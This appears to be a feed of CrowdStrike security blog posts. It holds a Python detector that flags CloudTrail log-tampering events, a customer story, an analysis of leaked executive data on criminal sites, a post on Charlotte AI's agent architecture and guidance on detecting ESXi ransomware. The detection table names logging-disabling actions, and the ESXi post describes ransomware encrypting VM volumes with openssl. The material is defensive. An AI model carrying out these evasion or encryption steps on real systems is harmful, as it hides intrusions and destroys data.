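The tamper-detection bullet above, as an added example that is not part of the original post: a Python detector run over constructed CloudTrail records, the same logic a SIEM rule or an EventBridge-triggered function would apply to the live stream. The event table, the severities, the escalation rules and the `detect_log_tampering` / `classify` function names are assumptions made for this example; the account ID and IP addresses in the sample are documentation placeholders.

```python
"""Flag CloudTrail events that disable or weaken logging (defence evasion).

SAMPLE_LOG is constructed for this example: the account ID and IP addresses are
documentation placeholders. The event table and severities are assumptions made
here, not a CrowdStrike or AWS rule set.
"""
import json

# (eventSource, eventName) pairs that remove or weaken an audit trail, with a
# baseline severity. MITRE ATT&CK lists this behaviour under T1562.008,
# Impair Defenses: Disable or Modify Cloud Logs.
TAMPER_EVENTS = {
    ("cloudtrail.amazonaws.com", "StopLogging"): ("HIGH", "CloudTrail logging stopped"),
    ("cloudtrail.amazonaws.com", "DeleteTrail"): ("HIGH", "CloudTrail trail deleted"),
    ("cloudtrail.amazonaws.com", "UpdateTrail"): ("MEDIUM", "CloudTrail trail reconfigured"),
    ("cloudtrail.amazonaws.com", "PutEventSelectors"): ("MEDIUM", "CloudTrail event selectors changed"),
    ("ec2.amazonaws.com", "DeleteFlowLogs"): ("HIGH", "VPC flow logs deleted"),
    ("logs.amazonaws.com", "DeleteLogGroup"): ("HIGH", "CloudWatch log group deleted"),
    ("logs.amazonaws.com", "PutRetentionPolicy"): ("LOW", "CloudWatch log retention changed"),
    ("s3.amazonaws.com", "PutBucketLogging"): ("MEDIUM", "S3 server access logging changed"),
    ("guardduty.amazonaws.com", "DeleteDetector"): ("HIGH", "GuardDuty detector deleted"),
    ("config.amazonaws.com", "StopConfigurationRecorder"): ("HIGH", "AWS Config recorder stopped"),
}


def _actor(record):
    """Best available identity string for the caller."""
    ident = record.get("userIdentity", {})
    return ident.get("arn") or ident.get("principalId") or ident.get("type", "unknown")


def classify(record):
    """Return a finding dict for one CloudTrail record, or None if it is benign."""
    key = (record.get("eventSource"), record.get("eventName"))
    if key not in TAMPER_EVENTS:
        return None
    severity, summary = TAMPER_EVENTS[key]
    params = record.get("requestParameters") or {}
    # Routine-looking calls escalate when their parameters show real damage.
    if key[1] == "UpdateTrail" and (params.get("isMultiRegionTrail") is False
                                    or params.get("enableLogFileValidation") is False):
        severity, summary = "HIGH", "CloudTrail coverage or log file validation reduced"
    elif key[1] == "PutRetentionPolicy" and params.get("retentionInDays", 10**6) < 90:
        severity, summary = "MEDIUM", f"log retention cut to {params['retentionInDays']} day(s)"
    finding = {
        "time": record.get("eventTime"), "actor": _actor(record),
        "source_ip": record.get("sourceIPAddress"), "event": key[1],
        "severity": severity, "summary": summary, "succeeded": "errorCode" not in record,
    }
    if not finding["succeeded"]:
        # A denied call is still worth an alert: someone is testing what they can switch off.
        finding["summary"] += f" (attempt denied: {record['errorCode']})"
    return finding


def detect_log_tampering(lines):
    """Scan newline-delimited CloudTrail JSON. Both bare records and the
    {"Records": [...]} delivery envelope are accepted; blank lines are skipped."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        obj = json.loads(line)
        for record in obj.get("Records", [obj]):
            finding = classify(record)
            if finding:
                findings.append(finding)
    return findings


SAMPLE_LOG = """
{"eventTime":"2024-04-18T10:01:12Z","eventSource":"cloudtrail.amazonaws.com","eventName":"DescribeTrails","userIdentity":{"type":"IAMUser","arn":"arn:aws:iam::111122223333:user/ops"},"sourceIPAddress":"203.0.113.10"}
{"eventTime":"2024-04-18T10:02:40Z","eventSource":"cloudtrail.amazonaws.com","eventName":"StopLogging","userIdentity":{"type":"IAMUser","arn":"arn:aws:iam::111122223333:user/ops"},"sourceIPAddress":"203.0.113.10","requestParameters":{"name":"org-trail"}}
{"eventTime":"2024-04-18T10:03:05Z","eventSource":"ec2.amazonaws.com","eventName":"DeleteFlowLogs","userIdentity":{"type":"IAMUser","arn":"arn:aws:iam::111122223333:user/ops"},"sourceIPAddress":"203.0.113.10","errorCode":"Client.UnauthorizedOperation"}
{"Records":[{"eventTime":"2024-04-18T10:05:00Z","eventSource":"cloudtrail.amazonaws.com","eventName":"UpdateTrail","userIdentity":{"type":"AssumedRole","arn":"arn:aws:sts::111122223333:assumed-role/Admin/alice"},"sourceIPAddress":"198.51.100.7","requestParameters":{"name":"org-trail","isMultiRegionTrail":false}},{"eventTime":"2024-04-18T10:06:30Z","eventSource":"logs.amazonaws.com","eventName":"PutRetentionPolicy","userIdentity":{"type":"AssumedRole","arn":"arn:aws:sts::111122223333:assumed-role/Admin/alice"},"sourceIPAddress":"198.51.100.7","requestParameters":{"logGroupName":"/aws/lambda/ingest","retentionInDays":1}}]}
{"eventTime":"2024-04-18T10:07:00Z","eventSource":"ec2.amazonaws.com","eventName":"RunInstances","userIdentity":{"type":"IAMUser","arn":"arn:aws:iam::111122223333:user/ops"},"sourceIPAddress":"203.0.113.10"}
"""

if __name__ == "__main__":
    for f in detect_log_tampering(SAMPLE_LOG.splitlines()):
        print(f"{f['time']} {f['severity']:6} {f['event']:20} {f['actor']} -> {f['summary']}")
```

Two details matter in practice. The denied `DeleteFlowLogs` call is kept as a finding rather than dropped, because a principal probing for the permission to remove logs is itself a signal worth correlating with that principal's other activity. And `UpdateTrail` is only escalated when its parameters turn off multi-region coverage or log file validation, which keeps ordinary trail maintenance from paging anyone.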

CrowdStrike Falcon Cloud Security for AWS

Falcon Cloud Security integrates with over 50 AWS services to deliver effective protection at every stage of the cloud journey, combining multi-account deployment automation, sensor-based runtime protection, agentless API attack and misconfiguration detection, and pre-runtime scanning of containers, Lambda functions and IaC templates. 

CrowdStrike leverages real-time IOAs, threat intelligence, evolving adversary tradecraft and enriched telemetry from across vectors such as endpoint, cloud, identity and more. This not only enhances threat detection, it also facilitates automated protection, remediation and elite threat hunting, aligned closely with understanding AWS assets, enforcing strict access control and authentication measures, and ensuring meticulous monitoring and management of cloud resources.

You can try Falcon Cloud Security through a Cloud Security Health Check, during which you’ll engage in a one-on-one session with a cloud security expert, evaluate your current cloud environment, and identify misconfigurations, vulnerabilities and potential cloud threats.

Protecting AWS Resources with Falcon Next-Gen SIEM

CrowdStrike Falcon® Next-Gen SIEM unifies data, AI, automation and intelligence in one AI-native platform to stop breaches. Falcon Next-Gen SIEM extends CrowdStrike’s industry-leading detection and response and expert services to all data, including AWS logs, for complete visibility and protection. Your team can detect and respond to cloud-based threats in record time with real-time alerts, live dashboards and blazing-fast search. Native workflow automation lets you streamline analysis of cloud incidents and say goodbye to tedious tasks. 

For the first time ever, your analysts can investigate cloud-based threats from the same console they use to manage cloud workload security and CSPM. CrowdStrike consolidates multiple security tools, including next-gen SIEM and cloud security, on one platform to cut complexity and costs. Watch a 3-minute demo of Falcon Next-Gen SIEM to see it in action.


Porter Airlines Consolidates Its Cloud, Identity and Endpoint Security with CrowdStrike

18 April 2024 at 19:56
  • As Porter Airlines scaled its business, it needed a unified cybersecurity platform to eliminate the challenges of juggling multiple cloud, identity and endpoint security products.
  • Porter consolidated its cybersecurity strategy with the single-agent, single-console architecture of the AI-native CrowdStrike Falcon® XDR platform.
  • With the Falcon platform, the airline has reduced cost and complexity while driving better security outcomes across its business and partner network. 

All passengers on Porter Airlines travel in style with complimentary beer and wine, free premium snacks, free WiFi, free inflight entertainment, no middle seats — the list goes on. 

With these perks, it’s no wonder Porter is growing fast. Headquartered in Toronto, Porter revolutionized short-haul flying in 2006. Since then, the airline has stretched its wings, amassing 58 aircraft, 3,200 employees and 33 destinations across North America. 

Early success has only fueled the company’s ambitions. Porter plans to double its workforce by 2026 and blanket all major U.S. cities and beyond. While this growth brings exciting business opportunities, it also creates new cybersecurity challenges, as the company piles on more data, devices and attack surfaces to protect. 

“When we started, we weren’t really a target for attackers, but we’re seeing more activity today,” said Jason Deluce, Director of Information Technology at Porter Airlines. 

To secure its growing business, Porter relies on the AI-native CrowdStrike Falcon platform and CrowdStrike Falcon® Complete for 24/7 managed detection and response (MDR). This is the story of how CrowdStrike delivers the flexible and scalable cybersecurity that Porter needs to secure its business today and into the open skies ahead.  

New Security Requirements

The move to CrowdStrike was born out of necessity. Porter’s previous security stack centered on a noisy endpoint detection and response (EDR) solution. Alerts overwhelmed Deluce’s lean security team, and the vendor wasn’t much help. Then, after three years without contact, the sales rep dropped a high renewal bill. 

Porter used a separate cybersecurity platform for vulnerability management and log management. But according to Deluce, “it was all manual. It detects vulnerabilities, but it doesn’t do anything about them. That wasn’t enough for us.” 

Furthermore, none of the solutions were integrated, leaving Deluce and his team with multiple agents and multiple consoles to operate. “They kind of talk about the same thing, but there’s nothing to marry them together in one place. You have to go to separate places, try to make sense of the data and determine if it’s accurate or not.”

With the business taking off and cyber threats surging, Porter needed a modern cybersecurity platform to reduce the noise and stop breaches. With its single-agent, cloud-native architecture, the Falcon platform gave Porter exactly what it needed: one agent and one console for complete visibility and protection across the company’s expanding security estate.

And whereas the previous cybersecurity vendors left Deluce with more questions than answers, Falcon Complete MDR acts as a force multiplier for Porter’s security team, providing around-the-clock expert management, monitoring, proactive threat hunting and end-to-end remediation, delivered by CrowdStrike’s team of dedicated security experts. 

Stopping Breaches in the Cloud with the Falcon Platform

A few years back, Porter made the strategic move to use Amazon Web Services (AWS) for hosting its business applications and corporate data. While this cloud strategy delivers the scalability and flexibility Porter needs to grow, it also introduces new security risks.

With the lightweight Falcon agent already deployed, Deluce was able to easily add CrowdStrike Falcon® Cloud Security to Porter's arsenal of protections. And because CrowdStrike and Amazon are strategic partners with many product integrations, deployment was a breeze.

“The one-click deployment is pretty amazing,” said Deluce. “We were able to deploy Falcon Cloud Security to a bunch of servers very quickly.”

Falcon Cloud Security is the industry’s only unified agent and agentless platform for code-to-cloud protection, integrating pre-runtime and runtime protection, and agentless technology in a single platform. Being able to collect and see all of that information in a single console provided immediate value, according to Deluce. 

Porter soon looked to expand its cloud protections with CrowdStrike Falcon® Application Security Posture Management (ASPM). While evaluating the product, Deluce gained visibility into dependencies, vulnerabilities, data types and changes his team previously had no visibility into, ranging from low risk to high risk. The company moved fast to deploy Falcon ASPM. 

With ASPM delivered as part of Falcon Cloud Security, Porter gets comprehensive risk visibility and protection across its entire cloud estate, from its AWS cloud infrastructure to the applications and services running inside of it — delivered from the unified Falcon platform. 

Better Visibility and Protection

Porter has deployed numerous CrowdStrike protections to fortify the airline against cyber threats. Recently, that included CrowdStrike Falcon® Identity Protection to improve visibility of identity threats, stop lateral movement and extend multifactor authentication (MFA). 

Deluce noted that previously, he had no easy way of knowing about stale accounts or service accounts. He’d have to do an Active Directory dump and go through each line to see what was happening. With Falcon Identity Protection, Deluce saw that Porter had over 200 privileged accounts, which didn’t add up, given his small number of domain admins. 

“I saw that a large group had been given print operator roles, which would have allowed them to move laterally to domain admins,” noted Deluce. “With Falcon Identity Protection, I was able to change those permissions quickly to reduce our risk. I also started enforcing MFA from the solution, which is something I couldn’t do before with the products we had.”

Gaining better visibility has been an important theme for Porter. The company also uses CrowdStrike Falcon® Exposure Management to gain comprehensive visibility to assets, attack surfaces and vulnerabilities with AI-powered vulnerability management.  

“We’re taking on new vendors faster than we’re taking on airplanes, so we need to limit our exposures,” said Deluce. “With Falcon Exposure Management, I can scan our digital estate to see which assets we have exposed to the internet, as well as any exposures belonging to our subsidiaries and partners, so we can reduce those risks.” 

The solution provided quick value when Deluce noticed one of his APIs was exposed to the internet, which shouldn’t have been the case. He also found that many of the assets connected to the company’s network belonged to third parties, which is a major risk, given that any attack against those devices could affect Porter. 

“Falcon Exposure Management shows us our vulnerabilities and exposures, and how we can reduce them,” said Deluce. “This is key as we continue to build out the company and expand our partner network.”

Securing the Future with CrowdStrike

Safety is paramount to airlines — and that includes keeping customer data safe. With its investment in CrowdStrike, Porter is demonstrating its commitment to safety and security. 

But for cybersecurity leaders like Deluce, the work is never done. Adversaries continue to get bolder, faster and stealthier. To stay ahead of evolving threats, Porter continues to lean into CrowdStrike, recently testing Charlotte AI and CrowdStrike Falcon® Adversary Intelligence, among other capabilities designed to help teams work faster and smarter.

Deluce reflected on how far the company has come in its cybersecurity journey and the role that security plays in enabling future growth. 

“We’ve gone from multiple tools, high complexity and spending a lot for poor visibility to a single pane of glass where we can do a bunch of new things with one platform,” concluded Deluce. “Cybersecurity is key to scaling the company and we know CrowdStrike is there for us.”


Secure Your Staff: How to Protect High-Profile Employees’ Sensitive Data on the Web

Organizations are increasingly concerned about high-profile employees’ information being exposed on the deep and dark web. The CrowdStrike Counter Adversary Operations team is often asked to find fake social media accounts and personally identifiable information (PII) that might be exposed.

Impersonations and leaked PII can unravel lives and ruin the reputations of individuals and their organizations. Through surface, deep and dark web monitoring, CrowdStrike is able to provide timely alerts to our customers, helping them take quick action to mitigate the potential damage caused by these posts.

The CrowdStrike Counter Adversary Operations team has created thousands of monitoring rules that protect our customers, and nearly 20% of them focus solely on high-profile employees. In this blog, we break down the data source categories that generate the most actionable notifications — including the type of data being posted — and name the actors that are posting most frequently on those sites.

CrowdStrike Counter Adversary Operations Analysis

The analysis and graph below represent only the true positive notifications from the Counter Adversary Operations team. A true positive notification is one that has been determined to be malicious in nature and actionable for customers.

By analyzing true positive notifications, we can identify the top actionable sources and their effects on organizations.

Actionable Source Types

Figure 1. Percentage of true positives by source type, February 2021-February 2024

Chat Mediums 

The most common chat site with true positives seen in our monitoring is Telegram. 

Telegram included data that could be used to target high-profile employees and potentially their organizations. Unlike the other sources, Telegram is rarely a directly targeted one: high-profile employee data does appear there, but buried in combined lists of millions of other people’s records, so the author most likely does not realize they have captured a high-profile employee’s credentials. Otherwise, actors would separate those credentials out and sell them individually at a premium. Most of the sensitive data identified on Telegram consists of email addresses and passwords for third-party applications. Although this does not directly target the employees’ corporate infrastructure, if those employees reuse the same password for personal and corporate accounts, the consequences can be catastrophic.

There are numerous authors on Telegram posting what we would classify as true positive notifications for high-profile employees. These notifications typically include email and password combinations that are currently being used by the high-profile employees.

Criminal Marketplaces 

Like Telegram, criminal marketplaces include data that could have an immediate impact on high-profile employees. Specifically, the majority of the exposed data on criminal marketplaces comes from multiple large breaches of credit card information, and threat actors look to sell credit card data individually and indiscriminately. Threat actors parse the data individually by credit card owner name and list each one for sale, typically for less than $1 USD.

Threat actors do not appear to do research based on the accounts they are selling, which leads us to believe that bot farms are being used to perform automated collection. For instance, if a threat actor knew they had a working credit card — along with the purchasing information of a CEO or high-ranking official — they would likely either raise the price for that individual or attempt to further exploit the information.

“Carder Market” is a broker site that sells exposed credit card information, including the PII needed to make online transactions. The site is nondiscriminatory and lists all available accounts after a purchase of $0.25 USD. This suggests bot behavior, which is confirmed when attempting to identify the perpetrators: in this case, every listing comes from a single account identified as “Admin.” Though accounts are posted indiscriminately, high-profile employees could still be targeted by searching the data for a specific name and suspected home of record.

Public Repositories 

Unlike chat mediums and criminal marketplaces, public repositories include highly targeted information. On public repositories, Counter Adversary Operations observed data of three types of high-profile employees: government officials, influential figures and C-suite personnel. The exposed PII included residence addresses, phone numbers, IP addresses, Social Security numbers, personal email addresses, detailed credit card information (including expiration date and security code) and vehicle plate numbers.

With the abundance of information included on these sites, bad actors have a higher potential to exploit high-profile employees either by harassing them or using their credit card/SSN information.

The public repositories we observed included Doxbin, Pastebin and GitHub. All three public repositories allow users to post anonymously (and high-profile employee material was posted anonymously), allowing bad actors to easily obfuscate themselves and their intentions.

Forums 

Malicious forum posts observed by our team are largely used to create and spread conspiracy theories or make derogatory statements related to individuals who have high name recognition. These posts are meant to degrade the reputation of an individual, but we rarely see posts containing sensitive data that could compromise the individual’s corporate credentials. 

For this category, the source that generated the most true positive notifications is 4chan. All true positive notifications on 4chan are posted under anonymous accounts. Unlike the other source categories, these posts are not limited to PII. Many 4chan posts concerning high-profile employees are antisemitic in nature and usually end up being linked to an existing conspiracy theory. Also unique to 4chan, the posts almost always target CEOs and other executives.

Counter Adversary Operations has witnessed cyber threats turn into physical acts of targeting on 4chan. For example, our team observed a political discourse that devolved into the author posting their disagreement with an individual’s political views, resulting in a call to arms where the home of the individual was targeted by a picket line.

Social Media 

Social media sites also produced targeted notifications in which actors directly singled out high-profile individuals. However, this medium is less prone to data leaking than public repositories. Social media posts include direct harassment of individuals; in most cases, the harassment revolves around a political discourse that led to hate speech from individual actors. Unlike chat mediums, where content can be kept in private channels, social media sites reach a wider swath of users, and such discourse appears to be a popular way for authors to gain notice.

The most common site on which Counter Adversary Operations observed this behavior was X (formerly Twitter). Counter Adversary Operations has aided customers in preparing documentation to take down X profiles that are attempting to impersonate high-profile employees’ accounts. These impersonating accounts used employees’ profile photos and names, making them more convincing.

The takedown process for social media accounts requires ample evidence of malicious behavior, not just the use of a name and photo. This can create a barrier for the affected user in getting the account taken down.

How CrowdStrike Counter Adversary Operations Can Help

CrowdStrike Falcon® Adversary Intelligence enables customers to monitor these sites and immediately alerts customers when activity against a high-profile employee is detected. And because CrowdStrike Counter Adversary Operations works with surface, deep and dark web data every day, the team knows which sites to focus on and which are less concerning. CrowdStrike offers an option to add an assigned Counter Adversary Operations analyst to help customers hunt for external threats to brands, employees and sensitive data, allowing their cyber professionals to devote their time to handling actionable data rather than hunting through a complex and ever-changing criminal ecosystem.

Additional Resources

  • Watch this short demo to see how Falcon Adversary Intelligence enables organizations to proactively uncover fraud, data breaches and phishing campaigns to protect their brand from online threats that target their organization.
  • To find out more about how to incorporate threat intelligence into your security strategy, visit the CrowdStrike Falcon Adversary Intelligence page.
  • Read about the cybercriminals tracked by CrowdStrike Counter Adversary Operations in the CrowdStrike 2024 Global Threat Report.
  • Request a free trial of the industry-leading CrowdStrike Falcon® platform.

Deploying the Droids: Optimizing Charlotte AI’s Performance with a Multi-AI Architecture

17 April 2024 at 17:57

Over the last year there has been a prevailing sentiment that while AI will not necessarily replace humans, humans who use AI will replace those who don’t.

This sentiment also applies to the next era of cybersecurity, which has been rapidly unfolding over the last year. Recent breakthroughs in generative AI hold enormous promise for modern defenders. Amid the dual pressures of accelerating attacks — down to just over two minutes, in some instances — and persistent skills shortages, generative AI has the potential to be not just an accelerator, but a veritable force-multiplier for teams of all sizes and maturity levels. We’ve seen these impressive gains firsthand working with early adopters of Charlotte AI (made generally available last month), with users reporting speed gains of up to 75% across supported workflows. 

Making humans as effective and efficient as possible begins with giving them the best tools for the job. Today’s AI landscape presents organizations with a rapidly growing and often dizzying landscape of foundational models developed by the open-source community, startups and large enterprises. Each model is unique in its strengths and applications, varying in speed, accuracy, training data, computational intensiveness and in the underlying risks they pose to end-users. Invariably, selecting just one model, or one family of models, can force users to accept trade-offs across any one of these variables.

Security teams shouldn’t have to compromise on the tools they use to protect their organizations. In an ideal world, their tools should support the maximum levels of speed and accuracy required across the myriad workflows they oversee, without trade-offs on performance and risk — and without placing the burden on defenders to calculate computational complexity.

This is one of the foundational principles on which we’ve designed Charlotte AI. To optimize Charlotte AI’s performance and minimize the drawbacks of using individual models, we’ve architected Charlotte AI with a multi-AI system; one that partitions workflows into discrete sub-tasks and enables our data scientists to isolate, test and compare how effectively different models perform across tasks. This approach enables our experts to dynamically interchange the foundational models applied across workflows, ensuring end-users can interact with an ever-improving AI assistant fueled by the industry’s latest generative AI technologies. 

Charlotte AI’s multi-AI design is singular across the cybersecurity landscape, applying cutting-edge system design from the front lines of genAI research to CrowdStrike’s unsurpassed data moat of award-winning threat intelligence, cross-domain platform telemetry and over a decade of expert-labeled security telemetry. In this blog, we shed light on how it comes together.

Under the Hood: From Question to Answer with AI Agents

Charlotte AI enables users to unleash the transformative power of generative AI across security workflows. With a simple question, users can activate Charlotte AI to answer questions about their environments, generate scripts or analyze emerging threat intelligence, all grounded in the high-fidelity telemetry of the Falcon platform. Charlotte AI’s natural language processing capabilities lower the level of skill and experience needed to make quick, accurate security decisions, while enabling even seasoned analysts to unlock incremental speed gains across every stage of their workflows: from surfacing time-sensitive detections, to investigating incidents, to taking action with Real Time Response.

Under the hood, Charlotte AI orchestrates over a dozen task-oriented “AI agents” to interpret a user’s question, plan the steps required to assemble a complete answer and structure the end result (Figure 1). Each AI agent is a subsystem consisting of a model and surrounding code that enables it to perform specific tasks and interact with other agents. One can think of each AI agent’s LLM (or other class of underlying model) as its “brain,” and each agent’s unique functionality (enabled by its surrounding code) as the skills that enable it to execute specific tasks. 

We can think of these AI agents much like the team of doctors working in concert in an operating theater, each overseeing specialized tasks; from administering anesthesia to operating on acute areas of focus. Similarly, each AI agent has a specific responsibility and area of expertise. Much like an operation that requires a team of specialists to collaborate, Charlotte AI’s dynamic task force of AI agents work together to support a growing number of workflows; from summarizing threat intelligence, to writing queries in CrowdStrike Query Language (CQL), to assisting incident investigations. 

At a high level, Charlotte AI activates AI agents to structure answers in the following sequence: 

  • Step 1: Understand the Question: Charlotte AI first activates AI agents tasked with understanding the user’s conversation context and extracting entities referenced in the question — such as threat actors, vulnerabilities or host features.
  • Step 2: Route Subtasks to AI Agents: Charlotte AI then activates a router agent, which determines which AI agent or agents to assign the user’s request. 
  • Step 3a: Scan for Answers: If a user asks a question that requires data from one or more API calls, the request is passed to a dedicated agent within Charlotte AI that ensures the information is retrieved and available for further processing. 
  • Step 3b: Plan Responses for Questions: If the user’s question doesn’t map to one or more API calls — for example, when asking Charlotte AI to generate a CQL query — Charlotte AI’s router agent can activate a number of other AI agents fine-tuned to accomplish specific tasks.
  • Step 4: Validate the Plan and Retrieved Data: The runtime agent executes the API calls outlined by the prior AI agent. The output of this process is then reviewed by a validation agent, which determines whether the resulting information is complete or requires additional information. This AI agent may even issue a warning to the end user if the answer is incomplete.
  • Step 5: Generate an Answer: A final AI agent structures the response to the user’s question, taking into account intuitive ways of presenting information to the end user and generating a summary of information presented. 

Figure 1. Charlotte AI uses task-specific AI agents to understand a user’s prompt and then assemble and validate the resulting answer.

Guardrails against LLM Overexposure  

Systems that give users direct visibility to the output of LLMs (often referred to as “naked LLMs”) risk exposing users to inaccurate information when LLMs perform unexpectedly or hallucinate — a phenomenon where LLMs provide information that is not supported by, or even contradicts, source data. Inaccurate information can have devastating implications in security, ranging from impeded productivity, to a weakened security posture, to a major breach. 

Charlotte AI’s multi-AI architecture plays a critical role in enabling a safe user experience, providing buffers that insulate end-users from the direct output of LLMs. First, by having the flexibility to apply diverse models across workflows, Charlotte AI enables CrowdStrike’s data science team to limit the ripple effects of unexpected changes in performance stemming from any one model. Another way Charlotte AI buffers users against direct LLM exposure is by using an agent tasked with validating answers before they are presented to end-users, verifying that answers are both consistent with the type of result the user is expecting and grounded in Falcon platform data. 
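To make the validation step concrete, the following Python is an added illustration of the kind of grounding check such an agent performs; it is not Charlotte AI's code (the post does not show its internals). It assumes a data-retrieval step has returned host records as a list of dicts, and it checks two things the paragraph names: that the retrieved data has the shape the router promised (a non-empty list of host records), and that every concrete entity the drafted answer cites (IP, hostname, SHA-256) actually appears in that data. The host records, answers and entity patterns are constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed, illustrative data standing in for what a retrieval step might
# hand back after a host-inventory API call; not real Falcon platform output.
RETRIEVED_HOSTS = [
    {"hostname": "WS-FINANCE-01", "local_ip": "10.20.30.41", "os": "Windows 11"},
    {"hostname": "SRV-DB-02", "local_ip": "10.20.30.77", "os": "Windows Server 2022"},
]

# Entity patterns an answer may cite. Hostnames are limited to upper-case
# hyphenated tokens so this toy extractor does not flag ordinary words.
_PATTERNS = {
    "ip": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "hostname": re.compile(r"\b[A-Z][A-Z0-9]*(?:-[A-Z0-9]+)+\b"),
    "sha256": re.compile(r"\b[0-9a-f]{64}\b"),
}


@dataclass
class Verdict:
    ok: bool
    ungrounded: list = field(default_factory=list)   # (kind, entity) pairs
    warnings: list = field(default_factory=list)     # text to surface to the user


def _flatten_values(obj):
    """Yield every scalar inside nested dicts/lists as a string."""
    if isinstance(obj, dict):
        for v in obj.values():
            yield from _flatten_values(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from _flatten_values(v)
    else:
        yield str(obj)


def check_schema(expected_type, retrieved):
    """Return a warning if the retrieved data is not the shape expected, else None."""
    if expected_type == "host_list":
        if not isinstance(retrieved, list) or not all(
            isinstance(r, dict) and "hostname" in r for r in retrieved
        ):
            return "retrieved data is not a list of host records"
        if not retrieved:
            return "retrieved host list is empty; answer cannot be grounded"
    return None


def validate_answer(expected_type, retrieved, answer):
    """Toy validation-agent check: the answer must match the expected result
    type, and every entity it cites must exist somewhere in the retrieved data."""
    verdict = Verdict(ok=True)
    schema_warning = check_schema(expected_type, retrieved)
    if schema_warning:
        verdict.ok = False
        verdict.warnings.append(schema_warning)
    known = set(_flatten_values(retrieved))
    for kind, pattern in _PATTERNS.items():
        for entity in pattern.findall(answer):
            if entity not in known:
                verdict.ungrounded.append((kind, entity))
    if verdict.ungrounded:
        verdict.ok = False
        verdict.warnings.append(
            "answer cites entities absent from retrieved data: "
            + ", ".join(e for _, e in verdict.ungrounded)
        )
    return verdict


if __name__ == "__main__":
    draft = "SRV-DB-02 and SRV-DB-03 (10.20.30.99) are affected."
    print(validate_answer("host_list", RETRIEVED_HOSTS, draft))
```

A failed verdict is what lets the pipeline refuse to show the draft, retry the retrieval, or attach the warning the post mentions instead of presenting the unsupported claim as fact.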

Turbocharging Security Workflows: From Answer to Action 

As large language models reach new levels of maturity and commoditization, security teams face a growing landscape of conversational AI assistants. Charlotte AI’s multi-AI architecture enables users to tap into the power of today’s best-of-breed foundational models and cutting-edge innovations across their workflows while minimizing the trade-offs of limiting their selection to any one model or model family. This architectural adaptability enables Charlotte AI to continuously elevate every analyst to new heights of efficiency, equipping them with the insight they need to make faster, more accurate decisions and reclaim a speed advantage against modern adversaries. For a deeper look at Charlotte AI’s architecture, download the white paper: The Best AI for the Job: Inside Charlotte AI’s Multi-AI Architecture.

CrowdStrike Falcon Next-Gen SIEM Unveils Advanced Detection of Ransomware Targeting VMware ESXi Environments

15 April 2024 at 20:47
  • CrowdStrike Falcon® Next-Gen SIEM enables companies to search, investigate and hunt down threats, including detection of advanced ransomware targeting VMware ESXi 
  • Initial access to the ESXi infrastructure[1] is typically gained through lateral movement using valid credentials
  • eCrime actors target and deploy ransomware in ESXi environments to increase the impact and scale of their attacks, which can be devastating for organizations

CrowdStrike Falcon Next-Gen SIEM, the definitive AI-native platform for detecting, investigating and hunting down threats, enables advanced detection of ransomware targeting VMware ESXi environments. 

CrowdStrike has observed numerous eCrime actors exploiting ESXi infrastructure to encrypt virtual machine volumes from the hypervisor to deploy ransomware in organizations. Access to ESXi infrastructure typically takes place as part of lateral movement. For example, SCATTERED SPIDER often gains initial access to a Microsoft Entra ID identity via social engineering and then uses this identity to access internal information repositories such as SharePoint to search for ESXi related credentials. 

CrowdStrike refers to this tactic to deploy ransomware as “Hypervisor Jackpotting,”[2] as eCrime actors can use ESXi hosts to rapidly expand the scope of affected systems.

Falcon Next-Gen SIEM can ingest ESXi logs to reveal evidence of attacker activity, detect suspicious behavior related to use of encryption commands and tooling in near-real time, audit configuration changes and events indicative of early signs of pre-ransomware activity, and detect logins from malicious IP addresses to create and raise incidents for investigation. 

Here, we provide an overview of how Falcon Next-Gen SIEM detects ransomware targeting ESXi environments.

Figure 1. Ransomware attack path (click to enlarge)

Start With Log Forwarding and Configuration

Forwarding ESXi logs to Falcon Next-Gen SIEM can help detect ransomware targeting ESXi environments. By ingesting and alerting on authentication and shell logs that ship with ESXi, we can find evidence of attackers gaining interactive shell access to the ESXi servers, running basic enumeration commands, shutting down virtual machines and using built-in tools like openssl to encrypt the virtual machine volumes.

We recommend using a syslog aggregation point, like the CrowdStrike® Falcon LogScale™ Collector, to forward logs to Falcon Next-Gen SIEM. Detailed instructions for doing this can be found in the CrowdStrike Tech Center.[3]

Once your log collector is set up, you can configure the ESXi infrastructure to forward the logs to your log collector. The default configuration for syslog for VMware ESXi 7.x and VMware vCenter 7.x is sufficient to get the correct logs to the unified, AI-native CrowdStrike Falcon® platform. You can find the instructions on how to enable remote syslog forwarding in VMware’s knowledge base.[4]

Detect the Use of Built-In Encryption Tools

Most of the activity prior to the encryption of critical virtual machine guest files could potentially be normal behavior like listing and shutting down virtual machines. These are important events to capture in an incident, but they are not indicative of an attack on their own. 

To create a detection, we need to identify an event with a high enough confidence. The use of a tool like openssl with the encrypt option (enc) being run from the command line on critical guest virtual machine files is a high-confidence event that indicates something malicious is happening in our environment. 

Falcon Next-Gen SIEM will detect this activity in near real time and create an incident for you. It will also gather surrounding activity that has happened on that host and include it in the incident.

Figure 2. Ransomware detected on a server running ESXi (click to enlarge)

In this detection, we see the use of openssl to encrypt sensitive files, the SSH connection, some virtual machine enumeration and the virtual machines being shut down before encryption.

Gain Insights Into Early Ransomware Signs

Detecting an in-progress attack within your environment is critical, but it is always better to get insights into a pending attack before it starts. We can look for configuration changes to an environment, especially those that don’t comply with best practices or that degrade the security posture of the environment. 

One easily detectable signal would be if a user enables SSH on one of your servers running ESXi. In a best-case scenario, this is an auditable event that the security team can confirm is legitimate behavior. In a worst-case scenario, it is the first tip that someone has compromised your ESXi infrastructure. We can easily surface this activity by creating a scheduled search looking for the specific indicator. Running it on a short interval with an overlapping time period will ensure we get timely notifications without missing events. 

Figure 3. Extended detection and response (XDR) scheduled search configuration in the Falcon platform (click to enlarge)

Figure 4. ESXi SSH-enabled detection (click to enlarge)

Reveal Unauthorized Logins from Malicious IP Addresses

Another indicator of a pending attack is the detection of logins to the ESXi management console that come from known malicious IP addresses where the console is purposely or accidentally exposed to the internet. Falcon Next-Gen SIEM leverages CrowdStrike’s integrated threat intelligence to identify any known indicators of compromise (IOCs) in critical data. By combining this with the ESXi login entries sent to the Falcon platform, we can detect the login attempts from known malicious sources.
